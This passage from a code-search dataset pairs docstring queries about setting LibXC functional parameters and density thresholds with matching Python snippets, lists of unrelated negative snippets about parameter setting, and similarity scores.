(os.path.isfile(paramfile)):\n paramjson = open(paramfile)\n params_var = json.load(paramjson)\n params.update(params_var)\n else:\n params_var = {}\n params_var['eta'] = [params['eta']]*24\n params_var['cov'] = [params['sigma']**2]*24\n params.update(params_var)\n \n with open(paramfile, 'w') as paramjson:\n json.dump(params_var, paramjson)\n \n return params", "def get_params(self):\n\n return None", "def get_params(self):\n\n return None", "def get_params(self):\n\n return None", "def get_defaults_jsonschema():\n preproc_schema = schema_utils.unload_jsonschema_from_marshmallow_class(DefaultsConfig)\n props = preproc_schema['properties']\n return {'type': 'object', 'properties': props, 'additionalProperties': False, 'title': 'global_defaults_options', 'description': 'Set global defaults for input and output features'}", "def default_params():\n params = {}\n params['load'] = None\n params['style'] = 'ggplot'\n params['show'] = True\n params['save'] = None\n return params", "def get_cfg_defaults():\n # Return a clone so that the defaults will not be altered\n # This is for the \"local variable\" use pattern recommended by the YACS repo.\n # It will be subsequently overwritten with local YAML.\n return __C.clone()", "def _invocation_params(self) -> Dict[str, Any]:\n return self._default_params", "def get_persisted_default_config_fields(self):\n return []", "def defaults_from(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"defaults_from\")" ]
[ "0.7586267", "0.75206536", "0.7345313", "0.7338341", "0.7124671", "0.708384", "0.7017844", "0.68795174", "0.68700486", "0.6861506", "0.68081266", "0.6789644", "0.672888", "0.670684", "0.670621", "0.6609515", "0.6601124", "0.6569071", "0.6553868", "0.6518829", "0.6501356", "0.6484483", "0.6474542", "0.6459664", "0.6444757", "0.6444757", "0.640728", "0.6397446", "0.63938874", "0.63924783", "0.6391959", "0.6341265", "0.63408846", "0.6337315", "0.6337315", "0.63363016", "0.63363016", "0.6331939", "0.6319714", "0.63148177", "0.6302801", "0.6286927", "0.6286927", "0.627258", "0.6267206", "0.62544084", "0.62524366", "0.6231532", "0.62275934", "0.6226791", "0.6220564", "0.62174106", "0.6213086", "0.6181721", "0.6168646", "0.616586", "0.6163417", "0.6124028", "0.6114368", "0.6103708", "0.6090595", "0.60889435", "0.6087451", "0.6067351", "0.6066823", "0.60586095", "0.60579056", "0.60487884", "0.6034284", "0.60263014", "0.6022118", "0.60129404", "0.5992695", "0.5990232", "0.5983712", "0.59702563", "0.59617233", "0.59599644", "0.59510684", "0.59499776", "0.5944268", "0.59441674", "0.5938543", "0.5937286", "0.5934828", "0.59333736", "0.59233904", "0.59062207", "0.5897115", "0.5895144", "0.5892439", "0.5888124", "0.5888124", "0.5888124", "0.5883893", "0.588337", "0.5881788", "0.5865441", "0.5857899", "0.5854559" ]
0.80710435
0
Sets all external parameters.
def set_ext_params(self, ext_params): num_param = core.xc_func_info_get_n_ext_params(self.xc_func_info) if num_param == 0: raise ValueError("LibXCFunctional '%s' has no external parameters to set." % self.get_name()) if len(ext_params) != num_param: raise ValueError( "The length of the input external parameters (%d) does not match the length of the functional's external parameters (%d)." % (len(ext_params), num_param)) core.xc_func_set_ext_params(self.xc_func, np.asarray(ext_params, dtype=np.double))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def set_params(self):\r\n pass", "def set_params(self, **kwargs):\n ...", "def set_params(self):\n raise NotImplementedError", "def set_params(self, params):", "def set_parameters(self,params):\n K3Supervisor.set_parameters(self,params)\n self.blending.set_parameters(self.parameters)", "def set_parameters(self,params):\n K3Supervisor.set_parameters(self,params)\n self.gtg.set_parameters(self.parameters)\n self.avoidobstacles.set_parameters(self.parameters)\n self.wall.set_parameters(self.parameters)", "def set_params(self, *argv, **kwargs):\n pass", "def set_params(self, *argv, **kwargs):\n pass", "def set_params(self, *argv, **kwargs):\n pass", "def set_params(self, *argv, **kwargs):\n pass", "def set_params(self, *argv, **kwargs):\n pass", "def set_params(self, **kwargs) -> NoReturn:\n pass", "def setParams(self, paramSet):\r\n pass", "def _set_parameters(self, parameters):\n self.parameters = parameters\n self._set_points_and_weights()", "def set_params(self, *arg):\n pass", "def setParameters(self, params):\n self.module._setParameters(params)\n # update parameters for learner\n self.learner.setModule(self.module)", "def _set_params(self,x):\r\n self.k._set_params(x)", "def set_parameters(self, params):\n self.kp = params.pgain", "def set_params(self, **params):\n self.check_params(params)\n self.sk_params.update(params)\n return self", "def _apply_params(self):\n config = self.get_startup_config()\n # Pass true to _set_params so we know these are startup values\n self._set_params(config, True)", "def set_parameters(self):\n\n if self.model_with_set_params:\n return\n\n self._model_with_set_params = self._parameter_values.process_model(\n self._unprocessed_model, inplace=False\n )\n self._parameter_values.process_geometry(self.geometry)\n self.model = self._model_with_set_params", "def set_params(self,**kwargs):\n for key in kwargs:\n setattr(self, key, kwargs[key])", "def initializeParameters(self):\n\n self.params[2].value = False\n self.params[3].enabled = False\n self.params[7].value = True\n self.params[7].enabled = False\n self.params[8].value = None\n self.params[8].enabled = False", "def set_params(self, *, params: Params) -> None: # pragma: no cover\n\t\tsuper().set_params(params=params)", "def set_hyperparams(self, params):", "def set_parameters(self, **kwargs):\n self.__multi_layer_perceptron.set_params(**kwargs)", "def init_params(self):\n self.clear()\n self._init_load_data()\n self._init_net_delay_data()", "def set_params(self, **params):\n return super().set_params(**params)", "def set_shape_params(self, params):\n self.alpha = params[0]\n self.beta = params[1]\n self.gamma = params[2]\n self.c500 = params[3]\n self.P0 = params[4]", "def set_params(self, **params):\n\n return super().set_params(**params)", "def _update(self):\n self.all_params = {}\n self._update_experiment_params()\n self._update_preprocessing_params()\n self._update_model_params()", "def setParameters(self, izParameters): #$NON-NLS-1$\r", "def gather_params(self):\n for layer in self.layers:\n for name, value in layer.params.iteritems():\n self.params[name] = value", "def _set_params(self, params, defaults):\n new_params = OrderedDict(\n zip(params, [x if isinstance(x, Parameter) else Parameter() for x in defaults])\n )\n for key, value in self._src.items():\n if key in new_params:\n new_params[key] = value\n\n self._src = new_params", "def _set_params(self, *args, **kwargs):\n\n params = args[0]\n\n # check for attempt to set readonly parameters (read-only or immutable set outside startup)\n 
self._verify_not_readonly(*args, **kwargs)\n old_config = self._param_dict.get_config()\n\n for (key, val) in params.iteritems():\n log.debug(\"KEY = \" + str(key) + \" VALUE = \" + str(val))\n self._param_dict.set_value(key, val)\n\n new_config = self._param_dict.get_config()\n # check for parameter change\n if not dict_equal(old_config, new_config):\n self._driver_event(DriverAsyncEvent.CONFIG_CHANGE)", "def set_params(self, **parameters):\n for parameter, value in parameters.items():\n if parameter == 'predictor':\n if isinstance(value, chainer.Link):\n del self.predictor\n with self.init_scope():\n self.predictor = value\n else:\n assert False, 'predictor is not Chain instance'\n elif parameter in ['lossfun', 'accfun', 'device']:\n setattr(self, parameter, value)\n else:\n self.sk_params.update({parameter: value})\n return self", "def init_params(self):\n blah", "def update_params(self):\n pass", "def set_params(self, params: Dict) -> None:\n self.leak.set_g(params[\"g_leak\"])\n self.kvhh.set_g(params[\"g_kvhh\"])\n self.cav.set_g(params[\"g_cav\"])\n self.kca.set_g(params[\"g_kca\"])\n self.nap.set_g(params[\"g_nap\"])\n self.tau_ca = params[\"t_ca\"]", "def set_all_param_values(layer, values):\n params = get_all_params(layer)\n for p,v in zip(params, values):\n p.set_value(v)", "def set_physical_params(self, params):\n self.M500 = params[0]\n self.r500 = params[1]\n self.z = params[2]", "def set_external_variables(self, xs):\n try:\n self.Attributes.update(xs)\n except AttributeError as e:\n raise e", "def setParameters(self):\n\n # Set the parameters\n self.taux = 24.2\n self.mu = 0.23\n self.G = 33.75\n self.alpha_0 = 0.05\n self.delta = 0.0075\n self.p = 0.50\n self.I0 = 9500.0\n self.kparam = 0.55", "def set_params(self, **kwargs):\n\n kw_keys = list(kwargs)\n\n if 'alpha' in kw_keys:\n self.alpha = kwargs['alpha']\n\n if 'beta' in kw_keys:\n self.beta = kwargs['beta']\n\n if 'gamma' in kw_keys: \n \tself.gamma = kwargs['gamma']\n\n if 'epsilon' in kw_keys:\n self.epsilon = kwargs['epsilon']\n \n self.nact = self.highbound-self.lowbound\n self.actions = np.arange(self.nact)", "def reset_parameters(self):\n self.lin.reset_parameters()\n self.att.reset_parameters()\n self.gnn_score.reset_parameters()\n if self.gnn_intra_cluster is not None:\n self.gnn_intra_cluster.reset_parameters()\n self.select.reset_parameters()", "def set_params(self, **kwargs):\n for param_name, value in kwargs.iteritems():\n # only set parameters that are in the default\n if param_name in self._default_params():\n setattr(self, param_name, value)\n self.params[param_name] = value\n else:\n print('AdjustedStat class does not accept %s as a ' \\\n 'parameter and will be ignored' % param_name)", "def set_params(self, params):\n params = dict_to_namespace(params)\n\n # Set self.params\n self.params = Namespace()\n self.params.ndimx = params.ndimx\n self.params.model_str = getattr(params, 'model_str', 'optfixedsig')\n self.params.ig1 = getattr(params, 'ig1', 4.0)\n self.params.ig2 = getattr(params, 'ig2', 3.0)\n self.params.n1 = getattr(params, 'n1', 1.0)\n self.params.n2 = getattr(params, 'n2', 1.0)\n self.params.sigma = getattr(params, 'sigma', 1e-5)\n self.params.niter = getattr(params, 'niter', 70)\n self.params.kernel = getattr(params, 'kernel', kern_matern)\n self.params.trans_x = getattr(params, 'trans_x', False)", "def params(self,new):\n self._params = new\n self._config_set()\n self._make_model()", "def define_parameters(self):", "def set_params(self, params: Dict):\n\n if params['training_instances'] 
is not None:\n self.training_instances = params['training_instances']\n if params['n'] is not None:\n self.n = params['n']\n if params['lda'] is not None:\n self.lda = params['lda']\n if params['verbose'] is not None:\n self.verbose = params['verbose']\n\n self.num_features = self.training_instances[0].get_feature_count()\n self.w = None\n self.b = None", "def set_params(self, **kwargs):\n warnings.warn(\"'set_params()' not defined for locator of type \" +\n str(type(self)))", "def updateParameters(self, parameters):", "def set_default_parameters(self):\n super().set_default_parameters()", "def set_params(self, **params: Any) -> Self:\n return _set_params(self, **params)", "def set_param_values(self, flattened_params, **tags):\n self._regressor.set_param_values(flattened_params, **tags)", "def set_params(self, params: Dict) -> None:\n self.leak.set_g(params['g_leak'])\n self.nav.set_g(params['g_nav'])\n self.kvhh.set_g(params['g_kvhh'])\n self.kva.set_g(params['g_kva'])\n self.kvsi.set_g(params['g_kvsi'])\n self.cav.set_g(params['g_cav'])\n self.kca.set_g(params['g_kca'])\n self.nap.set_g(params['g_nap'])\n self.kir.set_g(params['g_kir'])\n self.ampar.set_g(params['g_ampar'])\n self.nmdar.set_g(params['g_nmdar'])\n self.gabar.set_g(params['g_gabar'])\n self.tau_ca = params['t_ca']", "def set_parameters(self, **kwargs):\n self.__select_k_best.set_params(**kwargs)", "def SetVariationalParameters(self, data):\n self._SetParameters(data, 'SetVariationalParameters')", "def set_params(self, state_dicts):\n raise NotImplementedError", "def updateParameters(self):\n\n return", "def update_parameters(self):\n # We update gamma, gamma0, lambda and nu in turn (Bottolo et al, 2011)\n self.update_gamma()\n self.update_gamma0()\n self.update_lambda()\n self.update_nu()\n if self.sample_xi:\n self.update_xi()", "def set_parameters(self, f_ext=0):\n self.F_EXT = f_ext", "def set_params(self, params_):\n x_start, x_end = params_[\"lim_fit\"]\n self.find_idx_of_fit_limit(x_start, x_end)\n self.is_error_bar_for_fit = params_[\"use_error_bar\"]\n self.fitting_method1 = params_[\"method1\"]\n self.fitting_method2 = params_[\"method2\"]\n self.qty_to_min = params_[\"qty_to_min\"]\n\n for i, key in enumerate(self.params):\n # self.params[key].set(value=params_[\"val\"][i], min=params_[\"min\"][i], max=params_[\"max\"][i], vary=bool(params_[\"hold\"][i]), brute_step=params_[\"brute_step\"][i])\n if self.params[key].user_data is not None:\n if \"dontGenerate\" in self.params[key].user_data:\n continue\n self.params[key].set(value=params_[key][\"value\"], min=params_[key][\"min\"], max=params_[key][\"max\"], vary=params_[key][\"vary\"], brute_step=params_[key][\"b_step\"])", "def _set_params(self,x):\r\n self.k1._set_params(x[:self.k1.num_params])\r\n self.k2._set_params(x[self.k1.num_params:])", "def _set_params(self,x):\r\n self.k1._set_params(x[:self.k1.num_params])\r\n self.k2._set_params(x[self.k1.num_params:])", "def set_user_parameters(self, **params: dict):\n\n assert params, \"params variable can't be None\"\n for p, val in params.items():\n setattr(self, p, val)\n self.construct_repr_length()", "def set_parameters(self, *args, **kwargs):\n if len(args) > 0:\n if hasattr(args[0], '__iter__'):\n self._parameters = self._Parameters(*args[0])\n elif args[0] is None:\n self._parameters = self._Parameters()\n else:\n self._parameters = self._Parameters(*args)\n else:\n self._parameters = self._Parameters(**kwargs)", "def _set_model_parameters(self, verbose=False):\n from scipy.special import gamma\n\n z0 = 
self.z0\n\n # set parameters that are constants\n p_v, d_v, cs0, sigma, vout0 = (1, 2, 6.7, 0.1, 25.0)\n p_vB, d_vB, Mach0, p_M, d_M = (4, 2, 0.5, 1, 3)\n\n # calculate amplitudes that make the pdf integrate to 1\n A_v = np.log(10)*p_v/gamma(d_v/p_v)\n A_cs = np.log(10)/np.sqrt(2*np.pi)/sigma\n A_vB = np.log(10)*p_vB/gamma(d_vB/p_vB)\n A_M = np.log(10)*p_M/gamma(d_M/p_M)\n\n # store them in dictionaries\n self.cool_params = dict(A_v=A_v, p_v=p_v, d_v=d_v,\n A_cs=A_cs, cs0=cs0, sigma=sigma, vout0=vout0)\n self.hot_params = dict(A_vB=A_vB, p_vB=p_vB, d_vB=d_vB,\n A_M=A_M, Mach0=Mach0,p_M=p_M,d_M=d_M)\n # SN related parameters that set the reference values for loading factors\n self.params = dict(Esn=1.e51*au.erg, mstar=95.5*au.M_sun, vcool=200*au.km/au.s,\n Mej=10.*au.M_sun, ZSN=0.2, ZISM0=0.02)\n self.params['vej'] = np.sqrt(2.0*self.params['Esn']/self.params['Mej']).to('km/s')\n self.ref_params = dict(Mref=self.params['mstar'],\n pref=self.params['Esn']/(2*self.params['vcool']),\n Eref=self.params['Esn'],\n Zref=self.params['Mej']*self.params['ZSN'])\n\n # coefficients used in conversion from mass to other PDFs\n self.vp = (self.ref_params['pref']/self.params['mstar']).to('km/s').value\n self.vE = np.sqrt(self.ref_params['Eref']/self.params['mstar']).to('km/s').value\n self.Ze = (self.ref_params['Zref']/self.params['mstar']).cgs.value\n\n # parameters for scaling relations from Paper~I\n a = np.array(fit_alpha[z0])\n b = np.array(fit_beta[z0])\n\n self.scaling_params = dict(a=a, b=b)\n if z0 == '2H':\n self.cool_params['vout0'] = 45\n self.cool_params['cs0'] = 7.5\n elif z0 == '500':\n self.cool_params['vout0'] = 45\n self.cool_params['cs0'] = 8.5\n elif z0 == '1000':\n self.cool_params['vout0'] = 60\n self.cool_params['cs0'] = 10.0\n self.scaling_params['A'] = np.round(10.**(np.array(self.scaling_params['a'])),2)\n self.scaling_params['p'] = 1.+np.array(self.scaling_params['b'])\n self.enum=dict(M_cool=0, M_int=1, M_hot=2, M_total=3,\n p_cool=4, p_int=5, p_hot=6, p_total=7,\n E_cool=8, E_int=9, E_hot=10, E_total=11,\n Z_cool=12, Z_int=13, Z_hot=14, Z_total=15)\n\n # print parameters\n if verbose:\n self.show_parameters()", "def init(self, parameters):\n pass", "def _update_params(self):\n pass", "def set_params(model, params): # type: ignore\n for p, p_new in zip(model.parameters(), params):\n p.data = p_new.data", "def restore_parameters(self):\n for p in self.parameters:\n setattr(self, p, self.parameters[p].init_value)\n self.set_symmetry()", "def set_params(**kwargs):\n\t\tif \"study\" in kwargs.keys():\n\t\t\traise TypeError(\"Got an unexpected keyword argument: 'study'\")\n\t\telse:\n\t\t\tfor i in range(len(_RECOGNIZED_ELEMENTS_)):\n\t\t\t\t__settings[_RECOGNIZED_ELEMENTS_[i]] = __fractional(\n\t\t\t\t\t_RECOGNIZED_ELEMENTS_[i], study = \"LC18\", **kwargs)[0]", "def set_enc_params(self, enc_params):\n self.enc_params = enc_params", "def set_params(self, **params):\n if not params:\n # Simple optimization to gain speed (inspect is slow)\n return self\n else:\n self.kwargs.update(params)\n\n return self", "def reset_parameters(self):\n # for item in self.layer_dict.children():\n self.encoder.reset_parameters()\n self.vq.reset_parameters()\n self.generator.reset_parameters()\n\n self.speaker_dict.reset_parameters()\n self.speaker_dense.reset_parameters()", "def monkey_set_params(self, **args):\n self._monkey_set_params_counter += 1\n assert self._args == (args,), 'unexpected additional arguments. 
Keep the type in mind'", "def _inject_params(self, params):\n\n params.extend([LocaleParam(), CompileDomainsParam(),\n UseFuzzyParam(), StatisticsParam(),\n DirectoryParam(), OutputFileParam()])\n\n return super()._inject_params(params)", "def set(self, **kwargs):\n for key in kwargs:\n if key in self.bool_params:\n self.bool_params[key] = kwargs[key]\n elif key in self.int_params:\n self.int_params[key] = kwargs[key]\n elif key in self.str_params:\n self.str_params[key] = kwargs[key]\n elif key in self.float_params:\n self.float_params[key] = kwargs[key]\n else:\n raise RuntimeError('MOPAC calculator: unknown keyword: ' + key)", "def _setup_params(self,**params):\n ### a parameter might be passed in for one of the extra_pos;\n ### if a key in the params dict is not a *parameter* of this\n ### PO, then try it on the extra_pos\n for n,p in params.items():\n if n not in self.params():\n self.set_parameter_value(n,p)\n del params[n]\n\n Parameterized._setup_params(self,**params)", "def _set_parameters(self, override_previous=True, validate_legality=False,\n **parameters):\n # The 'mode' parameter is only relevant to the current hierarchy\n self.mode = parameters.pop('mode', self.mode)\n\n for name, value in iteritems(parameters):\n if isinstance(value, Pipe):\n if override_previous or (name not in self.__dict__ and\n name not in self._pipes):\n\n self._pipes[name] = value\n\n else:\n if override_previous or (name not in self.__dict__ and\n name not in self._pipes):\n\n if isinstance(value, BaseResource):\n self.add_resources({name: value})\n\n else:\n setattr(self, name, value)\n\n if validate_legality and not self._is_valid_input(name):\n raise AttributeError(\"Unrecognized parameter %r passed to %r\" %\n (name, self.data.name))", "def SetParams(ss, sheet, setMsg):\n if sheet == \"\":\n ss.Params.ValidateSheets(go.Slice_string([\"Network\", \"Sim\"]))\n ss.SetParamsSet(\"Base\", sheet, setMsg)\n if ss.ParamSet != \"\" and ss.ParamSet != \"Base\":\n sps = ss.ParamSet.split()\n for ps in sps:\n ss.SetParamsSet(ps, sheet, setMsg)\n if ss.Learn == LearnType.Hebbian:\n ss.SetParamsSet(\"Hebbian\", sheet, setMsg)\n elif ss.Learn == LearnType.ErrorDriven:\n ss.SetParamsSet(\"ErrorDriven\", sheet, setMsg)", "def setParameters(self, mu=1, k=10, c_a=1.1, c_r=0.5, epsilon=1e-20, **ukwargs):\n\t\tself.mu, self.k, self.c_a, self.c_r, self.epsilon = mu, k, c_a, c_r, epsilon\n\t\tif ukwargs: logger.info('Unused arguments: %s' % (ukwargs))", "def setup_parameters(self):\n structure = self.ctx.structure_initial_primitive\n ecutwfc = []\n ecutrho = []\n\n for kind in structure.get_kind_names():\n try:\n dual = self.ctx.protocol['pseudo_data'][kind]['dual']\n cutoff = self.ctx.protocol['pseudo_data'][kind]['cutoff']\n cutrho = dual * cutoff\n ecutwfc.append(cutoff)\n ecutrho.append(cutrho)\n except KeyError as exception:\n self.abort_nowait('failed to retrieve the cutoff or dual factor for {}'.format(kind))\n\n natoms = len(structure.sites)\n conv_thr = self.ctx.protocol['convergence_threshold'] * natoms\n\n self.ctx.inputs['parameters'] = {\n 'CONTROL': {\n 'restart_mode': 'from_scratch',\n 'tstress': self.ctx.protocol['tstress'],\n },\n 'SYSTEM': {\n 'ecutwfc': max(ecutwfc),\n 'ecutrho': max(ecutrho),\n 'smearing': self.ctx.protocol['smearing'],\n 'degauss': self.ctx.protocol['degauss'],\n 'occupations': self.ctx.protocol['occupations'],\n },\n 'ELECTRONS': {\n 'conv_thr': conv_thr,\n }\n }", "def reset_parameters(self, param_init):\n logger.info('===== Initialize %s with lecun style =====' % 
self.__class__.__name__)\n for n, p in self.named_parameters():\n init_with_lecun_normal(n, p, param_init)", "def set_params(self, w, b):\n self.w = w\n self.b = b\n return", "def updateParameters(self, parameters):\r\n return", "def updateParameters(self, parameters):\r\n return", "def updateParameters(self, parameters):\r\n return", "def updateParameters(self, parameters):\r\n return", "def updateParameters(self, parameters):\r\n return", "def updateParameters(self, parameters):\r\n return", "def updateParameters(self, parameters):\r\n return", "def updateParameters(self, parameters):\r\n return", "def parameters(self, parameters):\n\n self._parameters = parameters", "def parameters(self, parameters):\n\n self._parameters = parameters", "def parameters(self, parameters):\n\n self._parameters = parameters", "def set_params(self, parameters: dict = {}):\n for param in parameters:\n for step in self.steps:\n if param.lower() == step[0].lower():\n step[1].set_params(parameters[param])", "def set(self, **parameters):\r\n for name in parameters:\r\n if name in self.prm:\r\n self.prm[name] = parameters[name]\r\n else:\r\n self._illegal_parameter(name)", "def initialize_params(self, params):\n pass" ]
[ "0.7574865", "0.7349388", "0.7286496", "0.7278232", "0.7277006", "0.71515125", "0.712049", "0.712049", "0.712049", "0.712049", "0.712049", "0.70605385", "0.6988655", "0.6949013", "0.67994875", "0.6789911", "0.67877454", "0.67204505", "0.6715573", "0.67097175", "0.6694738", "0.6667838", "0.66278803", "0.6608927", "0.6591698", "0.65838313", "0.65538913", "0.65535563", "0.6548336", "0.6523312", "0.65137726", "0.6473934", "0.6458538", "0.64557403", "0.64483285", "0.6446568", "0.6437455", "0.6430906", "0.64252883", "0.64122784", "0.6411818", "0.6402043", "0.6390152", "0.63873214", "0.6361042", "0.6348618", "0.63478476", "0.6342477", "0.6340527", "0.6337397", "0.63354146", "0.6331966", "0.633193", "0.6331379", "0.6316179", "0.630419", "0.6303985", "0.6302928", "0.6302679", "0.6288184", "0.6273259", "0.6273061", "0.6267544", "0.6264291", "0.6264291", "0.62557983", "0.62323993", "0.6219942", "0.62048614", "0.6201726", "0.62001437", "0.6189989", "0.61855096", "0.6185153", "0.6165686", "0.61613107", "0.61608917", "0.61597246", "0.6158895", "0.61402565", "0.6139046", "0.61369514", "0.6122929", "0.61225563", "0.61205477", "0.61174077", "0.6112867", "0.6112867", "0.6112867", "0.6112867", "0.6112867", "0.6112867", "0.6112867", "0.6112867", "0.6105651", "0.6105651", "0.6105651", "0.6104895", "0.6098388", "0.609833" ]
0.6574025
26
Sets the density threshold below which the functional will not be evaluated.
def set_dens_threshold(self, dens_threshold): if dens_threshold < 0: raise ValueError("The density threshold cannot be smaller than 0.") core.xc_func_set_dens_threshold(self.xc_func, ctypes.c_double(dens_threshold))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def setThreshold(self, threshold): # real signature unknown; restored from __doc__\n pass", "def clear_density(self):\n self._density = None", "def set_threshold(self, threshold):\n self._threshold = check_value_positive('threshold', threshold)", "def threshold(self,thresholdValue):\n # TO DO\n pass", "def clamp(self):\n self.threshold.data.clamp_(self.min_threshold)", "def setThreshold(self, v):\n self._set(threshold=v)\n return self", "def setThreshold(self, v):\n self._set(threshold=v)\n return self", "def setThreshold(self, v):\n self._set(threshold=v)\n return self", "def setThreshold(self, v):\n self._set(threshold=v)\n return self", "def setThreshold(self, v):\n self._set(threshold=v)\n return self", "def set_sigma_threshold(self, sigma_threshold):\n\n if sigma_threshold < 0:\n raise ValueError(\"The sigma threshold cannot be smaller than 0.\")\n\n core.xc_func_set_sigma_threshold(self.xc_func, ctypes.c_double(sigma_threshold))", "def setThreshold(self, value):\n return self._set(threshold=value)", "def SetThreshold (self,VolumeNode, min, max):\n DisplayNode = VolumeNode.GetScalarVolumeDisplayNode()\n DisplayNode.SetApplyThreshold(True)\n DisplayNode.SetThreshold(min,max)", "def density(self, density):\n\n self._density = density", "def __init__(self, threshold: float = 0.3, initial_val: float = 0.0) -> None:\n self.threshold = threshold\n self.initial_val = initial_val", "def setPowerIfNecessary(self):\n if self.p.power == 0 and self.p.powerDensity > 0:\n self.setPowerFromDensity()", "def unsetThresholdLevel(self):\n return _libsbml.Input_unsetThresholdLevel(self)", "def set_threshold(self, cat, t):\n self.con.execute(\"update ct set threshold=%f where category='%s'\" \n % (t, cat))", "def matrix_filtering_threshold(self, matrix_filtering_threshold):\n\n self._matrix_filtering_threshold = matrix_filtering_threshold", "def set_ref_density(self, ref_density):\n self.ref_density = ref_density", "def infer_threshold(self, x: np.ndarray, fpr: float) -> None:\n self.backend.infer_threshold(self.backend._to_backend_dtype(x), fpr)", "def make_conditional_density(bgm_fit, threshold, sigma, width):\n pass", "def prune_values(self, threshold):\n changed = False\n new_table = dict()\n for assignment in self._table.keys():\n prob = self._table[assignment]\n if prob >= threshold:\n new_table[assignment] = prob\n else:\n changed = True\n\n self._table = new_table\n return changed", "def set_fade_threshold(self, address):\n self.model.fade_address = address", "def set_min_uncertainty(signal, threshold=0.05):\n # Increase Hirex-Sr uncertainties to be a rel error of 5% minimum (JUST FOR TESTING)\n corrected_unc=signal.std_y/signal.y<=0.05\n signal.std_y[corrected_unc]=0.05*signal.y[corrected_unc]\n\n # correction for normalized uncertainties\n if signal.s/signal.m<=0.05:\n signal.s=0.05*signal.m\n\n signal.std_y_norm=scipy.sqrt((signal.std_y / signal.m)**2.0 + ((signal.y / signal.m)*(signal.s / signal.m))**2.0)", "def updateThreshold(self, t):\n\n budget = self.budget\n self.threshold = self.init_threshold * self.diameter * ((budget-t) / self.budget)**self.decay_factor", "def threshold_col_del(self, threshold):\n self.data = self.data.dropna(thresh=threshold*len(self.data), axis=1) \n self.X = self.data.drop(self.target, axis =1)\n self.y = self.data[self.target]", "def threshold(self) -> float:\n return pulumi.get(self, \"threshold\")", "def apply_threshold(da, threshold=1.):\n with np.errstate(all='ignore'):\n result = xr.where(da < threshold, np.nan, da)\n result.attrs = da.attrs\n return 
result", "def _check_density(density, n_features):\n if density == \"auto\":\n density = 1 / np.sqrt(n_features)\n\n elif density <= 0 or density > 1:\n raise ValueError(\"Expected density in range ]0, 1], got: %r\" % density)\n return density", "def discrete_potential(function, threshold):\n\n return np.where(function >= threshold, 1, 0)", "def set_threshold_from_energy(energy, dryRun=False):\n if energy < 3.5:\n print(\"WARNING: optimal energy threshold should normally be set to half of the beam energy, but some noise will appear below energy threshold of 3.5 keV!\")\n caput(\"BL13J-EA-EXCBR-01:CONFIG:ACQUIRE:EnergyThreshold\",energy)", "def threshold(self) -> Optional[pulumi.Input[float]]:\n return pulumi.get(self, \"threshold\")", "def threshold(self) -> Optional[pulumi.Input[float]]:\n return pulumi.get(self, \"threshold\")", "def threshold(self) -> Optional[pulumi.Input[float]]:\n return pulumi.get(self, \"threshold\")", "def set_density(self, density, asset=None):\n self._set_property('pc:density', density, asset)", "def threshold(self) -> pulumi.Input[float]:\n return pulumi.get(self, \"threshold\")", "def threshold(self) -> pulumi.Input[float]:\n return pulumi.get(self, \"threshold\")", "def threshold(self) -> pulumi.Input[float]:\n return pulumi.get(self, \"threshold\")", "def threshold(self) -> pulumi.Input[float]:\n return pulumi.get(self, \"threshold\")", "def threshold(self) -> pulumi.Input[float]:\n return pulumi.get(self, \"threshold\")", "def set_ThresholdValue(self, value):\n super(UpdateTriggerInputSet, self)._set_input('ThresholdValue', value)", "def threshold(self, value):\r\n threshold = 0.5\r\n if value >= threshold:\r\n return 1\r\n else:\r\n return 0", "def apply_threshold(heatmap, threshold):\n heatmap[heatmap <= threshold] = 0\n\n return heatmap", "def setDeletesThreshold(self, v):\n return self._set(deletesThreshold=v)", "def set_density(self, theta, scale):\n self.density = Normal(self.mean(theta), scale)", "def test_soft_threshold():\n assert snet.soft_threshold(10, 100) == 0\n assert snet.soft_threshold(-10, 100) == 0\n assert snet.soft_threshold(10, 3) == 7\n assert snet.soft_threshold(-10, 3) == -7", "def disable_low_freq_out(self):\n self.write(\":SOUR:LFO:STAT OFF\")", "def set_thresh(self, t0=0.5, t1=None):\n self.t0 = t0\n self.t1 = t1", "def SetNarrowBandwidth(self, value: 'double') -> \"void\":\n return _itkReinitializeLevelSetImageFilterPython.itkReinitializeLevelSetImageFilterIF3_SetNarrowBandwidth(self, value)", "def setThreshold1(self, trsh):\n\t\tself.edgeThreshold1 = trsh\n\t\tself.edgeThreshold2 = trsh * 2.5", "def __init__(self, fx=np.greater):\n # Update doc\n\n if fx is None:\n def fx(x): np.logical_not(np.isnan(x).sum(0))\n\n self._fx = fx", "def above_threshold(self, value):\n # We use floating point number here so we have to take care\n return finf(value,self.min) or finf(self.max,value)", "def evaluate(self, threshold=0.5):\n pass", "def __init__(self, window: int = 5, threshold: float = 0.3, initial_val: float = 0.0) -> None:\n self.window = window\n self.threshold = threshold\n self.initial_val = initial_val", "def mask(self):\n\n mask = self.freqs >= self.minimum_threshold\n mask = mask.astype(int)\n self.freqs = self.freqs * mask\n self.sums = self.sums * mask", "def thresholdInput(self,samples):\n self.__thresholdInput(samples)", "async def threshold(self, ctx, threshold: int):\n if threshold > 0:\n self.bot.db.execute(\"UPDATE starboards SET threshold = ? 
WHERE channel_id = ?\", (threshold, ctx.channel.id))\n await ctx.say(\"star.threshold\", threshold)\n await self.set_topic(ctx.channel.id)\n else:\n await ctx.say(\"star.unsigned\", threshold)", "def updateThresholdValues (self, DoubleSlider, Node, ThMax ):\n DoubleSlider.Slider.minimum = 0\n DoubleSlider.SpinBoxL.setRange(0,ThMax)\n DoubleSlider.Slider.maximum = ThMax\n DoubleSlider.SpinBoxR.setRange(0,ThMax)\n if ThMax!=0:\n DisplayNode = Node.GetScalarVolumeDisplayNode()\n LowerThreshold = DisplayNode.GetLowerThreshold()\n UpperThreshold = DisplayNode.GetUpperThreshold()\n DoubleSlider.Slider.minimumValue = LowerThreshold\n DoubleSlider.Slider.maximumValue = UpperThreshold \n DoubleSlider.SpinBoxL.blockSignals(True)\n DoubleSlider.SpinBoxR.blockSignals(True)\n DoubleSlider.SpinBoxL.value = LowerThreshold\n DoubleSlider.SpinBoxR.value = UpperThreshold\n DoubleSlider.SpinBoxL.blockSignals(False)\n DoubleSlider.SpinBoxR.blockSignals(False)", "def test_unknown_thresholding(self):\n self.cube.coord(var_name=\"threshold\").attributes[\n \"spp__relative_to_threshold\"\n ] = \"between\"\n msg = \"Probabilities to percentiles only implemented for\"\n with self.assertRaisesRegex(NotImplementedError, msg):\n 